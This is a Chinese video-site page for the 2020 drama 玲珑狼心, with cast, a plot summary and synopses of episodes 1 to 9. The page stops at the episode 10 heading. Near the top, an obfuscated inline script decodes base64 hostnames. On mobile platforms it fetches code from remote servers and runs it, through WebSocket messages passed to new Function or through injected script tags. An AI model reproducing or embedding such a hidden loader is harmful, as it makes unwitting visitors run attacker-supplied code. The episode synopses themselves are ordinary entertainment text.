当前位置: 首页 电视剧 玲珑狼心

玲珑狼心 电视剧

评分:
8.0 推荐

分类:电视剧 内地 2020

主演:谷嘉诚 康宁 彭楚粤 盛蕙子 赵子麒 高基才 

导演:高林豹 

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDE2OA==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6a\x47\x6d\x4f\x65\x64\x57\x64\x6a\x48']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vc2ZrZGprbbDJramtkMC5zenNoc3MuY29tLGh0dHBzOi8vbb2pzbbGRrZmouZ3h0eXRqLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

剧情简介

查看分集剧情
玲珑狼心电视剧上映于2020年,由著名电视剧主演谷嘉诚 康宁 彭楚粤 盛蕙子 赵子麒 高基才 主演的国产,古装,电视国产,古装,电视电视剧,又名玲珑狼心2021,玲珑狼心。玲珑狼心讲述了:剧情介绍:少女玲珑投奔父亲故交时意外被狼咬伤,与公子炎青偶遇。炎青误认为玲珑是女盗贼,玲珑也反感炎青的自负做派,想不到炎青正是玲珑父亲故交的儿子。玲珑顺理成章住进炎府,当晩却发生失窃案,炎玉怀疑玲珑就是贼人。为自证清白,玲珑展开调查发现自己的感官因被狼咬变得格外敏锐。反常的玲珑吸引了炎青的注意,他情不自禁靠近玲珑,两人在合作中放下隔阂、破获了案件,还慢慢产生情愫。就在两人携手深入调查时,玲珑被狼咬伤的经历刺激了内心的另一重人格,变成狂暴勇猛、杀伐果决的“女狼王”。炎青想用温情治愈她,岂料玲珑的“状态”越发不稳,“软妹子”与“女狼王”频繁串线。几趟下来,原本桀骜不驯的炎青早已威严不在。面对炎青的温柔相待,玲珑甜在心里,在炎青的帮助下,玲珑重归正常,两人也发现失窃案后藏有更深的隐秘。剧情介绍:少女玲珑投奔父亲故交时意外被狼咬伤,与公子炎青偶遇。炎青误认为玲珑是女盗贼,玲珑也反感炎青 详情

分集剧情

玲珑狼心第1集剧情

南楚、西厥两国交接群山之中,蛰伏着古老的狼族,而狼族之秘可让人拥有长生寿元与无上力量。十八年前,狼族因内乱至狼王身死,残余狼族则被边军将领炎青收编为狼卫,惩恶扬善,至于狼族辛秘,似乎早已被人淡忘。一处深山木屋之中,血光乍现,狼啸响彻天地,炎青带领十数狼族之人将屋中贼人尽数屠杀。自炎青入军以来战功赫赫,却仍旧不见升官,他自身倒是乐得自由。只是提及父亲多年不管不问,炎青心中自然有怨,如今却被一封家属引回家门。城中繁华一片,麻袋从天而降,直直朝着一个面带白纱的女人砸去,炎青挺身相救,才将此女入眼。玲珑面色焦急微慌,身带许多银票,引炎青怀疑,幸而玲珑急中生智,以员外暗中强抢民女之事转移炎青注意力。玲珑趁炎青搜查员外府之际,施药致守卫昏迷,趁机逃入约定的密林之中,会见一位头戴斗笠的神秘男子。玲珑将事先应承交付的银票递出,并从对方口中得知母亲病重的消息,必须以八角金盘方可得救。炎家嫡子早逝,四子炎玉性情淡泊,炎厥身为长子,想要继承家业,最大的阻碍就是老二炎青。炎青得优柔青眼,这次被召回家中便是联姻之事,如此自然更成了炎厥的眼中钉。炎青刚回府,炎厥上演一出兄弟情深,之后便以其母遗留玉佩,引炎青前往南楚神庙,欲以乱情迷香陷害炎青。神庙中唯有玲珑一位女客居住在此,当她正待沐浴之时,明明察觉屋中有人,也能不动声色地借口离开。可惜炎青一眼便看出玲珑心思,并以绝对武力将其掌控在手。玲珑心思缜密又善于伪装,遇事冷静,不过两面之缘,便让炎青刮目相看。正在二人闲话期间,屋中迷香奏效,勾起炎青生理与心理的欲望,也是玲珑以银针入穴,才让他恢复神志。肌息香只对男性有迷情作用,再回想炎厥之前所言,炎青便瞬间想通其中关键。门外异响,张家老三带人前来捉奸在床,谁知破开房门,唯有玲珑女使与瞳哥儿正欲行男女之事。玲珑故作惊讶地走进门,三言两语让张家老三带走瞳哥儿,欲对其军法处置。玲珑故意不让炎青逃离,除了不想惹人口舌之外,也是为趁机小小作弄一下炎青。果不其然,张家老三刚出房门,炎青为救下瞳哥儿,便带人将其一顿群殴,也因此遭父亲责骂。翌日,玲珑主动来到炎府治疗公爷之症,并在配制药方上加入八角金盘。不远处正与炎玉闲话的炎青,这才知晓玲珑是南楚郡主,可惜她一直在冷宫长大,南楚战败后才会被作为人质送来西厥。玲珑自出生便伴随扫把星划过天际,落下克亲寡缘的名头,从此之后,母女二人便被打入冷宫。玲珑在屋外听着优柔等人的奚落,却仍能与之笑谈,言行举止皆低人一等,可见其心智之深。不论是利用优柔的优越感,贩卖不值钱的养颜之物赚钱,还是以救治公爷之便,获取八角金盘,皆尽显她聪慧之处,只是这份聪慧早已被藏身房梁之上的炎青尽收眼底。炎青回府后,却见炎厥行色匆匆将他引入堂中,兄弟二人一同面对父亲震怒。皇家贡品在炎家眼皮底下丢失,炎父以七日为限,要求炎厥寻回贡品。炎厥却故意一番冠冕堂皇,将重担推到炎青身上。炎青随着车轴压痕判断贡品被藏在粪车里,他带着自己的狼卫,来到一家新开的馒头铺,胸有成竹地认定馒头铺便是藏匿贡品之地。正在他们欲围攻馒头铺时,炎厥忽然带着一批人马出现,堂而皇之便要抢去炎青破案的功劳。

玲珑狼心第2集剧情

炎青并未在意炎厥邀功之举,倒是随眼见玲珑带着侍女小锦一身男装,弃置更加舒适的马车不用,反而在外雇佣普通马车,一看便知行踪有异。炎厥同样不顾突然离开的炎青,带人扫荡馒头铺后,竟真的在仓库里找到皇家贡品,只是贡品之中却少了狼族圣物嵌玉铁盒。炎厥不知此物为何,但贡品少了一样,他自然难辞其咎,连忙让人封锁全城,搜捕漏网之鱼。正在玲珑不知欲行何为,炎青便毫不客气地翻入马车之中,言行挑逗无状,竟让玲珑冲动出手,以针致他幻象从生。玲珑将炎青丢入烟花之地,再观狼卫于门外驻守,故意让小锦吩咐车夫等待,她则从后门潜入一辆马车之中。而此时,一个身着连帽黑衣,看不清容貌的男人,正带着狼族圣物嵌玉铁盒偷偷离开。经过烟花之地,铁盒上镶嵌的蓝色宝石突然发出光芒,引得男人无比兴奋,圣石发光便代表狼王能量就在附近。不久便是太后大寿,苏小姐领着数位贵家小姐前来,特意邀请鹭行首排练一出“麻姑献寿”,并让出自家后院供其练舞。黑衣男子观察四周无人,便断定让圣石发光之人,定是在这群女子之中。待鹭行首欲回马车离去,却见玲珑早已坐在马车之中,她收受钱财不问缘由,助其脱离狼卫视线。然而麻烦却并未就此停歇,当晚,玲珑于睡梦中忽感不适,醒来后发现房中一片狼藉。府中众人误以为黄鼠狼成精,实则是玲珑多魂症复发,而后吃下烤鸡才心满意足地回房睡觉。自八岁后,玲珑的多魂症再未复发,昨夜也并非月圆之夜,虽有对症药丸压制,可没有母亲施针救治,她始终内心难安。身在烟花之地的炎青神志清醒后,发现自己正于一群丑陋女子寻欢作乐,愤怒之余更是疑心玲珑。可惜炎青想要上门问个清楚,却被母亲误以为是胡闹之举强行阻止,加之炎玉身在南楚为质时,曾得玲珑照顾,早已倾心,自然处处维护。玲珑麻烦不断,正欲停止一切行动,巧得苏家小姐前来邀请她为练舞的姐妹调养身体。玲珑本想借势躲避炎青纠缠,谁知仍在苏府后院与其相遇,更因二人言行看似“亲密”,惹得优柔心生醋意,全由苏小姐与鹭行首出面才为玲珑解围。玲珑深藏不露又曾捉弄炎青,而优柔也并非他心爱之人。炎青本就不愿与优柔成亲,此刻正在家中喝酒庆祝,他倒是巴不得玲珑与优柔纠缠不休。深夜,黄小姐前来拜访玲珑,并希望她对今夜之事守口如瓶,谁知离开不久便被黑衣人捉走。第二天,黄小姐的尸体被发现,炎青在看到尸体上的狼爪印后,当即便接下这件案子。狼族内乱,剩余几人皆成了炎青的狼卫,如今狼爪再现,若想知道真相,唯有抓住凶手。根据昨夜昏迷的车夫和随行侍女的口供,玲珑便是首当其冲的嫌疑人,炎青正门入府不成,便偷偷翻墙潜入。眼见玲珑的确请来医者,后又因治病无果似有黯然神伤之举,炎青这才打消对她的怀疑。炎青丝毫没有潜入郡主府的自觉,堂而皇之现身后院,出言似是安慰却又更像调戏。二人推搡之间,玲珑贴近炎青胸前,神志再次恍惚,之前在烟花之地,二人贴近便也是如此。玲珑一时不知缘由,又因神志恍惚,一时不慎落入水中。炎青出手相救,本想以呼吸之法救人,却正好被小锦撞见,趁人之危的名头便就此坐实。

玲珑狼心第3集剧情

是夜,玲珑睡下之后,突然出现在酒馆之内,巧听炎青与兄弟谈及自身却毫无兴趣,只是眼神犀利,仿若变成另一个人。玲珑脚下轻跃便出了酒馆,只是不小心踩到修缮墙缝的红泥,一路留下痕迹。幽暗密室之中,赵小娘被黑衣人审讯,带头之人见狼族圣石仍不见发光,顿时恼羞成怒,玲珑也在赵小娘受苦的噩梦中醒来。府中毫无异样,可玲珑见角落那沾满红泥的鞋子,证明着她再次犯病。赵小娘的尸体被丢弃,随行仆人坦言她曾经在昨夜因喉咙不适寻玲珑救治,而发现尸体的两个酒馆之人瞳孔变色,炎青一见便知是南楚异术,更加疑心玲珑。郡主府外墙仍有红泥脚印留下,炎青在隔壁大妈口中,轻易知道郡主府曾有黄鼠狼作怪,之后便是玲珑病重。炎青自然不信怪力乱神,倒是更显玲珑嫌隙深重,他明知审讯不得,索性求父亲委任书一封,逼得玲珑不得不与他一同查案。有了可以时刻相处的办法,炎青对玲珑问话自然也更为方便。二人与大街上并肩而行,巧被优柔撞见,炎青避之不及便如老鼠见了猫,将玄宇推出去打发优柔。玄宇生性耿直,武功高强,软硬不吃,优柔纠缠无果,愤然离去,只是这份“仇”却是记下了。玲珑随炎青来到苏府,等待苏小姐对账之时,炎青忽然听见书房中传来她惊恐之声。待炎青踢开书房大门,黑衣人跃窗逃走,守在府外的玄宇和瞳哥儿竟毫无察觉。苏小姐惊恐未定,保护她的下人虽受狼爪之伤,却并无大碍。眼下两方对质,玲珑也道出其中始末。原来黄小姐不满苏小姐出演麻姑,便来索要能致喉咙肿痛,难以发声的药粉,意图取而代之。玲珑因不敢得罪而应承,却也暗中为苏小姐的茶中下了解药,只是赵小娘得苏小姐馈赠点心,这才受了连累,从而夜寻玲珑救治。玲珑深知炎青对自己疑心深重,有关赵小娘深夜来访一事,故意要求面见苏小姐才能坦白,为得就是一劳永逸,打消炎青疑心她说谎。眼下受害者皆与“麻姑献寿”有关,炎青要求所有参与此事之人聚集在苏府,并严禁带自家下人,一并换成炎府守卫。毕竟黑衣人竟可躲开玄宇和瞳哥儿的眼睛,炎青有理由怀疑此人是苏府下人,脱下衣服才会不受二人关注。黑衣男人自然不会善罢甘休,当夜便率领下人潜入苏府,放置许多迷烟,轻易便将府中守卫迷晕,唯独玄宇仍能强撑一战。炎青听觉敏锐,虽有警觉,却也并不能在迷烟中坚持太久,得玲珑主动送来解药,即便他不信任对方也无选择余地。炎青接受玲珑的解药,这才救醒狼卫等人,绝地反击。众人有惊无恙,优柔欲追黑衣人却也只是被打晕在地,唯独鹭行首不见踪影。苏小姐故意提醒炎青书房有异,这才得以让他及时阻止鹭行首被害。众多黑衣人阻碍之下,为首男子成功逃脱,待鹭行首稍稍恢复心神后,才道出自身经历。为首男子一直严刑威逼鹭行首,要求她让圣石发光无果,此前两位死者必然也是同样遭遇,而圣石二字也引起炎青注意。

玲珑狼心第4集剧情

经历一番严刑拷打,被活捉的黑衣人终于松口,将尊使意在取回狼王能量之事坦白,只因小姐被软禁无法助其抓人,这才铤而走险。炎青好奇小姐究竟意指何人,俘虏却突然反抗被再次打晕,而他身上并无狼族印记,瞳哥儿一眼便认出,眼前之人是狼族堕落者。狼族子弟误入歧途就会被苍狼抹除狼族印记,而后赶出部落后,再不承认其狼人身份。堕落者便只能混迹在人群中,靠贩卖邪术为生。炎青自幼在外成长,不知狼族诸事,眼下听闻此规矩,断言尊使定是堕落者首领。今夜乃是月圆之夜,即便玲珑以药丸压制也毫无用处。玲珑化身狼隐,与正巧赶来的炎青正面冲突,一直焦急要将东西还回去,却又一问三不知。二人打斗,玲珑一招一式落下的狼爪印便是证据,而她也承认自己名为隐狼。炎青将玲珑打晕后,再见她胸口并无印记,便认定她也是狼族堕落者,既是俘虏口中的小姐。也不知是理智还是情感,炎青总觉得其中有一不合理之处,便是狼性天生冲动,绝不会自小被软禁而无动于衷。可在此期间,炎厥得知炎青将玲珑定罪,为抢夺功劳,特意瞒着他欲行严刑逼供之举。狼隐岂是普通麻绳可以束缚,在挨了炎厥一鞭子后,强力脱身反击之下,不慎让房中失火。狼隐是非分明,火中救下炎厥性命,后被炎青打晕。炎青欲待其苏醒审问,却见玲珑以一人之人分为玲珑和隐狼二人,外人看似自言自语,实则是两个人互相对话。炎青难以忍受眼下混乱情况,再次将玲珑打晕后,喂下药丸才得以压制隐狼。炎青为得知玲珑秘密,作为交换,率先坦白身世谜团。在父亲口中,炎青的母亲是乐坊歌姬,十八年前携款私逃。然而在炎青的记忆中,母亲绝非卖唱女,甚至能文能武,是世间少有的奇女子,他也已找寻母亲十八年之久。玲珑遵守承诺,坦白她是打着议亲的旗号来西厥,在二十五岁之前确保自己没有勋贵愿意迎娶。只要玲珑作为嫁不出去的老姑娘回到南楚,就能拿到属于她的贫瘠封地,自然也可救出身在冷宫受苦的娘亲。也许效忠父亲或投靠西厥的好处更多,但在玲珑心里,效忠父亲意味着需要帮助父亲在西厥兴风作浪,等着不知何时会来的死期,而她更不可能弃母亲于不顾投靠西厥。玲珑坦言,处在她的境地,唯有伪装成窝囊废才是最好的选择。至于玲珑初次巧遇炎青后所见斗笠男子是她舅父,此人常年游走在南楚和西厥之间做药材生意,她也是趁此便利捎些药材送给母亲。之所以见面鬼祟,不过是玲珑担忧质子之身,会给舅父这个普通商人带去麻烦。但仅凭玲珑一面之词很难取信炎青,委屈愤怒之下,一句话点醒对方。赵小娘遇害当晚,炎青的确身在酒馆,玲珑很清楚他曾说过什么,而因酒馆修缮墙角的红泥留下脚印,也与郡主府外墙相同,证明她当晚的确来过此地。酒馆与抛尸地点相距甚远,时间上,根本不足以让玲珑往返两地。玄宇也忽然想起两处蹊跷,玲珑前来西厥时,除了小锦,还有两名婆子,只因两个婆子身患传染病,才由炎夫人出面驱逐,打发回乡。两个婆子是南楚藩王的人,玲珑明显是借炎夫人除掉这两名眼线。而勋贵之中传言玲珑是扫把星,便是出自玲珑本人之口宣传,反倒证明玲珑所言非虚。炎青想通其中关键,便欲弥补求得玲珑原谅,巧在炎玉正细心照料于她。炎玉坦白玲珑多魂症一事,更为隐狼和玲珑担保人品,而这一切被躲在门外的炎厥听得一清二楚。炎厥因听不懂三人所言,现身责怪炎青放走要犯,无意中透露贡品缺失一物,炎青才恍然得知自己一直查错了方向。

玲珑狼心第5集剧情

炎厥本是为动用私刑前来与玲珑请罪,见对方似乎完全忘记那日恩怨,索性借坡下驴。既没有前事恩怨,炎厥所求更是没有阻碍,当下便付出百两银票收买玲珑陷害炎青。炎青正在房中与狼卫商谈案件,以及狼族相关之事,玲珑便因应下炎厥做戏陷害一事,当夜便主动前来寻炎青喝酒。玲珑以保守隐狼之秘和百两银票作为酬谢,帮助炎青捉拿幕后黑手。二人协议达成,当下便如相见恨晚,直至不省人事。待日上三竿,炎青在苏小姐和鹭行首之间醒来,两位女子酥胸半露惊得他赶紧下床收拾一地狼藉。炎厥掐准时辰带着父亲前来,果然气得父亲将炎青一顿毒打,好在苏小姐与鹭行首昏迷不醒,并不知此情形。玲珑随炎厥来到要府与公爷交代案件诸事,正见炎青裸露上身被鞭责得满背是伤,她自然不会放过这次“报仇”的机会。玲珑故意借口为炎青疗伤,实则各种猛药招呼于他,虽确有消毒治疗之效,却也让炎青受罪不少。玲珑刚从炎府归来,苏小姐便派管家前来邀她入府治病。玲珑一脚踏入苏府,便被数个黑衣人团团围困,苏小姐的真实面目也尽显眼前。玲珑之前故意在苏小姐面前提及自身也曾出现在乐坊,为得就是引蛇出洞,炎青从暗处现身,轻易便让苏小姐伏法。这一切不过是玲珑与炎青的计划,可惜管家早已不见踪迹。苏小姐本欲为管家抗下所有事,谁知竟早已被人下了异术,当场自裁。苏小姐畏罪自杀,同伙逃匿被追捕,这件案子也就此盖棺定论。某树林中,一身粗布麻衣打扮的苏小姐,在炎青和玲珑的护送下出了城,就此拜别。原来二人感念苏小姐良心未泯,曾也主动提醒搭救鹭行首,便在救回其性命后,让苏小姐假死,以新的身份重新生活。至于管家,苏小姐只知其名弥亚,身上并无狼族印记,其他信息也知之甚少。此案暂了,玲珑与炎青一路回城,要求对方交付承诺的百两黄金,却不知在她们经过的一处茶摊,正有一个面带斗笠的男人。第二天,炎青为应昨日之约,在南楚神庙奉上百两银票,特意对着铜镜换了不下十几件衣服。好不容易精心打扮之后,却在进入南楚神庙客房那一瞬间,所有激情都变成了满腔醋意。炎玉与玲珑自幼相识,亦可算青梅竹马,感情自然深厚。炎青听着炎玉诉说与玲珑的感情,听得满不是滋味儿,也假装银票未带想要离开,更是置气假装与鹭行首有约。炎青负气离开,却听玲珑随后追来,本是惊喜的笑容,却在听对方只是希望他顺路带些东西送给鹭行首,脸色又立刻垮了下来。为了面子,炎青甚至不惜让玄宇先一步去往乐坊,让鹭行首陪他做戏,免得在随行而来的小锦面前漏了馅。入夜,玲珑应炎青还钱而来,却见街上立刻华灯初起,满眼皆是繁华,人人手中都有一盏花灯。今日并非节日,玲珑接过小孩赠送的花灯,一时不知这究竟怎么回事。

玲珑狼心第6集剧情

一位富家公子以重金让城中百姓提前过上元节,只需一句上元安康便可在城中免费吃喝玩乐。玲珑提着花灯不论走到哪里,皆不需花费一分,可惜如此反常现象,她必然不可能接受。玲珑在一处算命摊子前停下,唯独这里愿意收钱,她便随意抽签算卦。卦象显示,百米之内必能遇到此生缘分,玲珑一转身便见炎青站在她的面前。因月圆狼隐出现之故,玲珑一直不可见月圆,也就从未享受过上元节的热闹。炎青特意布置今夜,便是想给玲珑一份礼物,得见她一路玩得自在开心,显然很是喜欢。炎青眼见时辰已到,特意带着玲珑来到高处观看烟花,他们再次靠近竟再次让隐狼出现。打斗中,炎青的玉佩掉落摔成两半也顾不得许多,他拾起碎片便连忙追赶隐狼而去。黑暗中,弥亚本欲带着人马前来抓住玲珑,却在看见玉佩的瞬间选择撤退。弥亚一看便知那是狼王玉佩,所以暗藏狼王能量,才会让圣石发光,心中更是愤慨、不甘,狼王之物竟然落在一个泼皮身上。玲珑成为狼隐后跃入附近树林不见踪影,小锦连忙回炎府求助炎玉。炎青带领狼卫将树林团团围住,炎玉则以烤鸡香味引诱狼隐出现,并早已在烤鸡上撒了药粉,这才让玲珑再次陷入昏睡。玲珑恢复神志后,再见炎青现身靠近,便如避之蛇蝎一般赶紧离去。多次靠近证明炎青与玲珑过于亲密,就会引出狼隐,炎青自己也生出这般疑惑。倒是暗中跟随的炎厥,竟倾心于狼隐,希望她可以永存于玲珑体内。狼卫生性喜爱自由,最是受不了各种束缚,炎青既不承认自己爱慕玲珑才不愿回到边关,索性怂恿他直接登门询问狼族之事。炎青在郡主府等待许久,得玲珑冷淡相对,最后只是买了些胭脂水粉。巧遇炎玉为家宴邀请玲珑,因害怕炎夫人得知玲珑多魂症之事,也不得不让她出面赴宴。二人在堂中所言,被最爱做梁上君子的炎青听得一清二楚。家宴之上,优柔本就与玲珑矛盾颇深,故意借机羞辱于她,明面是一起投壶玩乐,却让玲珑往返捡箭。炎玉虽有心相护,却碍于官身不便与女子纠缠,倒是炎青到来才让优柔转移注意力。炎青实在难以忍受优柔纠缠,索性将退婚一事言明便径直离开,谁知玲珑私下忍不住笑意,再次被优柔抓住把柄。优柔故意将箭丢上树枝,玲珑女子之身爬树,必然脸面尽失。玲珑装作委屈却又不得不屈服的模样,实则故意寻个借口受伤,便可正大光明寻医官治病。谁知,正当玲珑故意脚下不稳摔下树来,却被炎青飞身接住。二人接触过密,隐狼再次出现,性格直爽的隐狼当场便与优柔发生冲突。炎青再次将玲珑打晕,以醉酒理由遣散众人,带着她离开是非之地。经历这次事故,炎青再也不敢接触玲珑过甚,便与屋外守夜。只是天寒地冻,炎青欲以热水泡澡,谁知竟有个女子突然出现。

玲珑狼心第7集剧情

一双玉手搭在炎青肩上,炎青回头一看,原来是玲珑闯入,只见她似水柔情地躺下,风情万种地看向炎青。玲珑主动褪下肩膀衣衫,肌肤上的苍狼啸月胎记引起炎青注意,他立刻便认出眼前之人乃是狼隐。狼隐故意勾引炎青,再重新隐匿于体内,待玲珑恢复神志,随手拿起一旁的瓶子便砸向炎青的脑袋。二人追逐,炎青想要解释也顾不得穿衣,正巧被炎父等人撞个正着。炎玉担忧玲珑声誉,让她暂时避开是非,炎厥趁机刁难炎青,引炎公爷再次鞭打炎青。公爷与优柔父亲一同,本想让炎青有个交代,谁知他竟直接装晕昏倒。这种小伎俩可骗得过母亲,却绝骗不过炎玉,轻轻一巴掌就让躺在床上装晕的炎青疼得跳起来。此事关乎玲珑声誉,更关乎两国之间的关系,一旦南楚利用此事大做文章,炎家世代镇守西厥,便是头等失职大罪。与此同时,玲珑正坐在铜镜前与狼隐争执,却遇优柔为争风吃醋之事前来挑衅。即便玲珑事先服用压制药物,狼隐却依旧在优柔出手威胁之时出现。在优柔眼中,狼隐与玲珑互相牵制,每次出手又能轻而易举制住自己,一时气愤,抬脚踹上玲珑腹部。狼隐出手总被玲珑制止,已觉无趣离开,而这一脚,玲珑必然无力抵挡,被踢得当场吐血。之前,舅父已经在深山处寻到一位名叫弥萨的神医,玲珑眼下内伤不愈的理由前往求治。有炎玉在其中调和,公爷当下便允了玲珑求医之事,炎青虽也有意共同前往,却也终究抹不开面子,也不愿再因自己而让玲珑病发。撇开不自知的情感,炎青也的确想要从玲珑身上挖出她与苍狼的联系。隐狼从小便与玲珑共生,只有隐狼出现,她肩膀下方才会出现胎记,而玲珑主掌身体时,胎记便会消失不见,这其中有太多让人苦思不解之事。炎玉带着些许士兵随行保护,与玲珑一起往西冷山求医。途中,炎玉忽然神秘兮兮领着玲珑来到山中一处木屋,里面满屋桃花树,几位弹曲儿的女侍,更有玲珑最爱吃的食物。玲珑从未郊游游玩,若是在城中这般定会惹人注意,如今才有机会一偿心愿。念及玲珑内伤未愈,炎玉才费心将木屋之中布置成郊外模样,其用心着实让人感动。经此插曲之后,众人来到弥萨住处,炎玉见数声叫喊无人回应,便孤身上山推门而入。不多会,炎玉便被一个年轻男子推出门外,此人便是弥萨,只是神医通常也是性格古怪之人。玲珑并未就此放弃,反而故意以自身怪病激将弥萨。当玲珑当众放狼隐出来后,弥萨果然对她的病充满兴趣,不但很快治疗好她的内伤,更愿意留下炎玉和小锦随意居住于此。可惜,狼隐在出现一次之后,得知玲珑是为求医对付她,便如何也不肯再出现。有些问题,无法从狼隐口中得到答案,而玲珑此次外出只有一月时限,弥萨却并无任何担忧之情,倒是更加急切想要开始尝试诊治。

玲珑狼心第8集剧情

针对玲珑的多魂症,弥萨准备用催眠疗法,可玲珑自幼生活在水生火热,尔虞我诈之中,根本不可能放松心神,催眠也自然对她难以奏效。弥萨长久尝试,险些把包括自己在内的三人弄得昏昏欲睡,玲珑却还是分毫不受影响。一路赶来的炎青看着神医门外守军,其中一人便是公爷心腹,自然不能让他知晓玲珑多魂症之事。炎青故意领着狼卫与之发生冲突,逼得守卫不得不退入林中扎营。炎青借口他们场面征战,内伤旧疾数不胜数,此番也是为求神医而来。炎玉自然不信他的鬼话,倒也没有排斥的情绪,当炎青在炎玉口中得知玲珑近况后,立刻扯着嗓子挑衅,引玲珑出手与他追逐打闹,这才让弥萨催眠成功。狼隐不受控制的出现,道出她存在于玲珑体内的原因。原来玲珑似乎有什么非常重要之物需还回去,可她却忘记这段往事,而狼隐的出现便是要替她完成任务。狼隐记得她本是没有胎记的,只是刚要谈到那夜的秘密,却突然头疼欲裂,接着昏迷不醒。弥萨断定玲珑的多魂症是因童年受到刺激,自身无法接受内心的痛苦情绪,这才选择性忘记,但这段潜在的痛苦却在无形中催生出狼隐。想要彻底根治多魂症,需让玲珑返回南楚,回想往事,但她身为质子,自然是不切实际。暂且无法根治,弥萨便决定用催眠疗法压制住狼隐,而玲珑在精神集中时无法被催眠,这便需要炎青引导她肆意释放天性。这段日子,炎青便各种挑衅玲珑,故意激她出手与自己打闹,这才能让治疗颇有成效。这天,弥萨门口忽然出现一位昏倒的男人,玲珑听闻他是为救女而来,在此跪了三天三夜,心中竟动了恻隐之心,对这个陌生人产生同情与帮助心思。可当弥萨看见这个男人却是火冒三丈,原来他所求的药竟是让人卧床三五年起不来的毒药。此人名为冷二河,村中几年前不断有人病死,得神医诊治却被告知他们是因得罪山神才会引来灾祸,唯有每年给山神献祭童男童女才可趋吉避凶,得山神保佑。今年轮到冷二河的女儿,他宁愿女儿卧床三五年,也好过送给山神不知生死。众人化身冷二河亲戚来到他家里居住,玲珑每每看见冷二河爱护心疼女儿的模样,甚至自愿代替他女儿去献祭。虽然是为了查出其中真相,但如此也是危险至极,可见父亲二字是玲珑的心结。炎玉承诺玲珑,若能让狼隐出现并完全配合她的行动,才愿意答应代替一事。可狼隐已被弥萨压制,玲珑别无他法,只得想到接近炎青来达到目的。为此,玲珑非但看到炎青赤裸洗澡的模样,更是趁夜迷晕对方,想要伸手去触碰炎青胸膛,却又放不下女儿家的矜持。一通闹剧之后,炎青和狼卫于暗中保护,玲珑成功代替冷二河的女儿被所谓神使带走。期间,神使给予被献祭的人美好生活的期待,而这些农民子女,只有在过年才能吃得上米饭,如今有肉可吃,竟开始觉得自己被献祭是一件无比幸福的事。

玲珑狼心第9集剧情

神使带着众人就地扎营,玲珑假装腹部不适,偷偷与树林身处的炎青会面,还未言谈几句,便被寻来的神使打断。当夜,帐篷外有人影闪过,玲珑上前才知对方并非炎青,只是动静也同样引来了神使。男子一路逃跑被炎青所救,才知他的爱人绣娘被父亲逼迫嫁给旁人,结果夫家为了报酬竟将绣娘送上圣女之路。男子今夜便是为救绣娘而来,炎青感怀男子深情,主动挺身相助。炎青单自在林中逃跑,故意被神使抓住,再以男子经历的故事道出,谁知神使竟然主动邀请他加入圣童的行列。炎青求之不得,倒是玲珑在得知他竟然撒谎与自己私定终身,心中愤怒至极,但为大局考虑,她也不得不配合炎青。众人一路来到一处村庄,此地就像世外桃源,包括之前被献祭的人也都在这里生活。众人一听生活在这里,不但生活无忧无虑,也不用干活,开始更加庆幸自己被选中。经炎青四处打探,发现村中门口的断龙石放下就无法打开,而后山禁地有人把守无法进入。村子的中央有个上锁的屋子,平时不准任何人进入,唯有晚上做沉思的时候才能进去一个时辰。神使体谅他们好不容易有情人终成眷属,特意准备一个单独的屋子,屋子里也只有一张大床。为了不在神使面前露馅儿,玲珑即便千万般不愿也只能憋着,倒是炎青一副得逞的模样,迫不及待铺床叠被。谁知玲珑当场约法三章,炎青也就只有打地铺的命。第一次沉思,玲珑和炎青跪在最后一排,屋子最前方有个大缸被布遮盖,看不清里面究竟放着何物。众人对着缸跪拜,随着神使将布掀开,许多白色粉末般的东西飘散在空气中,让所有人都感觉神清气爽。玲珑和炎青为了弄清楚缸中的秘密,第二天就悄悄潜入屋内,发现里面泡着一株红色的草药,就连玲珑也认不出此乃何物。正在二人百思不得其解时,神使非常恭敬地领着几个黑衣人前来查看草药。玲珑与炎青轻易躲开黑衣人的追捕,而这些人明显就是与弥亚狼狈为奸的属下。炎青一时不明白,弥亚养着一群白吃白喝的人究竟意欲何为。而神使突然来检查每个人的进度,所有人都满身红色斑点,唯有沉思时闭气的玲珑和炎青毫无反应。其中更有两人身上长满红斑,其中一人更是在柱子上留下狼爪印,显然是红色草药让普通人变成了狼族。据神使所说,这两个人已经通过山神考验,可以进入后山禁地觐见山神。为了弄清楚其中缘由,玲珑与炎青深夜去往附近树林寻找可以让人犯红斑的草药。途中,炎青打晕巡逻之人,为巨狼松开束缚,恢复自由。谁知巨狼竟然不听炎青所言,凶残攻击于他,倒是玲珑细心,拔出巨狼身上的三根针。银针去除,巨狼变回正常大小,并在玲珑的指示下咬死巡逻之人,便跑入树林不见踪影。二人事成,玲珑回去后便开始制药,只是炎青存着心思,故意借口药草涂不了全身,死皮赖脸地让玲珑帮忙。

玲珑狼心第10集剧情

